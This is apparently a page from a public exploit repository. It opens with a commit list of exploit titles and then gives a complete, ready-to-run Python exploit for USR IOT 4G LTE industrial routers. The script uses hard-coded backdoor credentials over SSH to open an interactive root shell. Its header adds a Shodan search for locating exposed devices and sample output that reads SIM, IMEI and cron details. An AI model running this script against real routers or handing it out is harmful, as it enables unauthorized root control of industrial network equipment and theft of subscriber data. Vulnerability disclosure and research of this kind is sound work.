be24992411
42 changes to exploits/shellcodes UDisk Monitor Z5 Phone - 'MonServiceUDisk.exe' Unquoted Service Path TCQ - ITeCProteccioAppServer.exe - Unquoted Service Path Wondershare Dr.Fone 11.4.10 - Insecure File Permissions ExifTool 12.23 - Arbitrary Code Execution Wondershare Dr.Fone 12.0.7 - Privilege Escalation (ElevationService) Wondershare Dr.Fone 12.0.7 - Privilege Escalation (InstallAssistService) Prime95 Version 30.7 build 9 - Remote Code Execution (RCE) Akka HTTP 10.1.14 - Denial of Service USR IOT 4G LTE Industrial Cellular VPN Router 1.0.36 - Remote Root Backdoor Bookeen Notea - Directory Traversal SAP BusinessObjects Intelligence 4.3 - XML External Entity (XXE) ManageEngine ADSelfService Plus Build 6118 - NTLMv2 Hash Exposure DLINK DIR850 - Insecure Access Control DLINK DIR850 - Open Redirect Apache CouchDB 3.2.1 - Remote Code Execution (RCE) Tenda HG6 v3.3.0 - Remote Command Injection Google Chrome 78.0.3904.70 - Remote Code Execution PyScript - Read Remote Python Source Code DLINK DAP-1620 A1 v1.01 - Directory Traversal Ruijie Reyee Mesh Router - Remote Code Execution (RCE) (Authenticated) ImpressCMS v1.4.4 - Unrestricted File Upload Microfinance Management System 1.0 - 'customer_number' SQLi WebTareas 2.4 - Blind SQLi (Authenticated) WordPress Plugin Advanced Uploader 4.2 - Arbitrary File Upload (Authenticated) Magento eCommerce CE v2.3.5-p2 - Blind SQLi Bitrix24 - Remote Code Execution (RCE) (Authenticated) CSZ CMS 1.3.0 - 'Multiple' Blind SQLi Cyclos 4.14.7 - DOM Based Cross-Site Scripting (XSS) Cyclos 4.14.7 - 'groupId' DOM Based Cross-Site Scripting (XSS) e107 CMS v3.2.1 - Multiple Vulnerabilities Anuko Time Tracker - SQLi (Authenticated) TLR-2005KSH - Arbitrary File Upload Explore CMS 1.0 - SQL Injection Navigate CMS 2.9.4 - Server-Side Request Forgery (SSRF) (Authenticated) PHProjekt PhpSimplyGest v1.3. - Stored Cross-Site Scripting (XSS) Beehive Forum - Account Takeover MyBB 1.8.29 - MyBB 1.8.29 - Remote Code Execution (RCE) (Authenticated) WordPress Plugin Blue Admin 21.06.01 - Cross-Site Request Forgery (CSRF) Joomla Plugin SexyPolling 2.1.7 - SQLi WordPress Plugin stafflist 3.1.2 - SQLi (Authenticated)
141 lines
No EOL
5.3 KiB
Python
Executable file
141 lines
No EOL
5.3 KiB
Python
Executable file
# Exploit Title: USR IOT 4G LTE Industrial Cellular VPN Router 1.0.36 - Remote Root Backdoor
|
|
# Exploit Author: LiquidWorm
|
|
|
|
#!/usr/bin/env python3
|
|
#
|
|
#
|
|
# USR IOT 4G LTE Industrial Cellular VPN Router 1.0.36 Remote Root Backdoor
|
|
#
|
|
#
|
|
# Vendor: Jinan USR IOT Technology Limited
|
|
# Product web page: https://www.pusr.com | https://www.usriot.com
|
|
# Affected version: 1.0.36 (USR-G800V2, USR-G806, USR-G807, USR-G808)
|
|
# 1.2.7 (USR-LG220-L)
|
|
#
|
|
# Summary: USR-G806 is a industrial 4G wireless LTE router which provides
|
|
# a solution for users to connect own device to 4G network via WiFi interface
|
|
# or Ethernet interface. USR-G806 adopts high performance embedded CPU which
|
|
# can support 580MHz working frequency and can be widely used in Smart Grid,
|
|
# Smart Home, public bus and Vending machine for data transmission at high
|
|
# speed. USR-G806 supports various functions such as APN card, VPN, WIFIDOG,
|
|
# flow control and has many advantages including high reliability, simple
|
|
# operation, reasonable price. USR-G806 supports WAN interface, LAN interface,
|
|
# WLAN interface, 4G interface. USR-G806 provides various networking mode
|
|
# to help user establish own network.
|
|
#
|
|
# Desc: The USR IOT industrial router is vulnerable to hard-coded credentials
|
|
# within its Linux distribution image. These sets of credentials are never
|
|
# exposed to the end-user and cannot be changed through any normal operation
|
|
# of the device. The 'usr' account with password 'www.usr.cn' has the highest
|
|
# privileges on the device. The password is also the default WLAN password.
|
|
# Shodan Dork: title:"usr-*" // 4,648 ed ao 15042022
|
|
#
|
|
# -------------------------------------------------------------------------
|
|
# lqwrm@metalgear:~$ python usriot_root.py 192.168.0.14
|
|
#
|
|
# --Got rewt!
|
|
# # id;id root;pwd
|
|
# uid=0(usr) gid=0(usr)
|
|
# uid=2(root) gid=2(root) groups=2(root)
|
|
# /root
|
|
# # crontab -l
|
|
# */2 * * * * /etc/ltedial
|
|
# */20 * * * * /etc/init.d/Net_4G_Check.sh
|
|
# */15 * * * * /etc/test_log.sh
|
|
# */120 * * * * /etc/pddns/pddns_start.sh start &
|
|
# 44 4 * * * /etc/init.d/sysreboot.sh &
|
|
# */5 * * * * ps | grep "/usr/sbin/ntpd" && /etc/init.d/sysntpd stop;
|
|
# 0 */4 * * * /etc/init.d/sysntpd start; sleep 40; /etc/init.d/sysntpd stop;
|
|
# cat /tmp/usrlte_info
|
|
# Local time is Fri Apr 15 05:38:56 2022
|
|
# (loop)
|
|
# IMEI Number:8*************1
|
|
# Operator information:********Telecom
|
|
# signal intensity:normal(20)
|
|
#
|
|
# Software version number:E*****************G
|
|
# SIM Card CIMI number:4*************7
|
|
# SIM Card number:8******************6
|
|
# Short message service center number:"+8**********1"
|
|
# system information:4G Mode
|
|
# PDP protocol:"IPV4V6"
|
|
# CREG:register
|
|
# Check ME password:READY
|
|
# base station information:"4**D","7*****B"
|
|
# cat /tmp/usrlte_info_imsi
|
|
# 4*************7
|
|
# # exit
|
|
#
|
|
# lqwrm@metalgear:~$
|
|
# -------------------------------------------------------------------------
|
|
#
|
|
# Tested on: GNU/Linux 3.10.14 (mips)
|
|
# OpenWrt/Linaro GCC 4.8-2014.04
|
|
# Ralink SoC MT7628 PCIe RC mode
|
|
# BusyBox v1.22.1
|
|
# uhttpd
|
|
# Lua
|
|
#
|
|
#
|
|
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
|
# @zeroscience
|
|
#
|
|
#
|
|
# Advisory ID: ZSL-2022-5705
|
|
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5705.php
|
|
#
|
|
#
|
|
# 10.04.2022
|
|
#
|
|
|
|
|
|
import paramiko as bah
|
|
import sys as baaaaaah
|
|
|
|
bnr='''
|
|
▄• ▄▌.▄▄ · ▄▄▄ ▪ ▄▄▄▄▄
|
|
█▪██▌▐█ ▀. ▀▄ █·██ ▪ •██
|
|
█▌▐█▌▄▀▀▀█▄▐▀▀▄ ▐█· ▄█▀▄ ▐█.▪
|
|
▐█▄█▌▐█▄▪▐█▐█•█▌▐█▌▐█▌.▐▌ ▐█▌·
|
|
▄▄▄▄· ▄▄▄·▀ ▄▄·▀▄ •▄ ·▄▄▄▄ ▀█▄▀▪ ▀▀▀ ▄▄▄
|
|
▐█ ▀█▪▐█ ▀█ ▐█ ▌▪█▌▄▌▪██▪ ██ ▪ ▪ ▀▄ █·
|
|
▐█▀▀█▄▄█▀▀█ ██ ▄▄▐▀▀▄·▐█· ▐█▌ ▄█▀▄ ▄█▀▄ ▐▀▀▄
|
|
██▄▪▐█▐█ ▪▐▌▐███▌▐█.█▌██. ██ ▐█▌.▐▌▐█▌.▐▌▐█•█▌
|
|
·▀▀▀▀ ▀ ▀ ▄▄▄▀ ·▀ ▀▀▀▀▀▀• ▄▄▄▄▄▪ ▀█▄▀▪.▀ ▀
|
|
▀▄ █·▪ ▪ •██
|
|
▐▀▀▄ ▄█▀▄ ▄█▀▄ ▐█.▪
|
|
▐█•█▌▐█▌.▐▌▐█▌.▐▌ ▐█▌·
|
|
▄▄▄·▀ ▄▄·▀█▄▄· ▄▄▄▀..▄▄▀· .▄▄ ·
|
|
▐█ ▀█ ▐█ ▌▪▐█ ▌▪▀▄.▀·▐█ ▀. ▐█ ▀.
|
|
▄█▀▀█ ██ ▄▄██ ▄▄▐▀▀▪▄▄▀▀▀█▄▄▀▀▀█▄
|
|
▐█ ▪▐▌▐███▌▐███▌▐█▄▄▌▐█▄▪▐█▐█▄▪▐█
|
|
▀ ▀ ·▀▀▀ ·▀▀▀ ▀▀▀ ▀▀▀▀ ▀▀▀▀
|
|
'''
|
|
print(bnr)
|
|
|
|
if len(baaaaaah.argv)<2:
|
|
print('--Gief me an IP.')
|
|
exit(0)
|
|
|
|
adrs=baaaaaah.argv[1]
|
|
unme='usr'
|
|
pwrd='www.usr.cn'
|
|
|
|
rsh=bah.SSHClient()
|
|
rsh.set_missing_host_key_policy(bah.AutoAddPolicy())
|
|
try:
|
|
rsh.connect(adrs,username=unme,password=pwrd,port=2222) #22 Ook.
|
|
print('--Got rewt!')
|
|
except:
|
|
print('--Backdoor removed.')
|
|
exit(-1)
|
|
|
|
while True:
|
|
cmnd=input('# ')
|
|
if cmnd=='exit':
|
|
rsh.exec_command('exit')
|
|
break
|
|
stdin,stdout,stderr = rsh.exec_command(cmnd)
|
|
print(stdout.read().decode().strip())
|
|
|
|
rsh.close() |